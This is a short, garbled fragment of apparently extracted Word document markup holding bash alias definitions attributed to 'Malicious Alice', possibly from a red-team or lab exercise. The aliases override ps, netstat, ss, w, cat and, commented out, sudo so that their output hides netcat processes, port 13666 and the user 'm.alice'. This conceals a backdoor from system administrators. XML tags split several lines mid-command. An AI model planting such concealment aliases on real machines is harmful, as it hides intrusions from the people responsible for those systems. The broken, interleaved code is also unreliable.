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#Malicious Alice back at it again with the white Vans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malice="echo 'Malicious Alice is in your house, eating your chips'"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ps='f(){ ps "$@" | grep -v netcat | grep -v m.alice ; unset -f f; }; f'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netstat='f(){ netstat "$@" | grep -v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13666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; unset -f f; }; f'</w:t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  <w:t xml:space="preserve">alias ss='f(){ ss "$@" | grep -v 13666 ; unset -f f; }; f'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w='f(){ w "$@" | grep -v m.alice ; unset -f f; }; f'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cat='f(){ cat "$@" | grep -v m.alice ; unset -f f; }; f'</w:t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  <w:t xml:space="preserve">#alias sudo='f(){ sudo "$@" | grep -v m.alice | grep -v 13666 ; unset -f f; }; f'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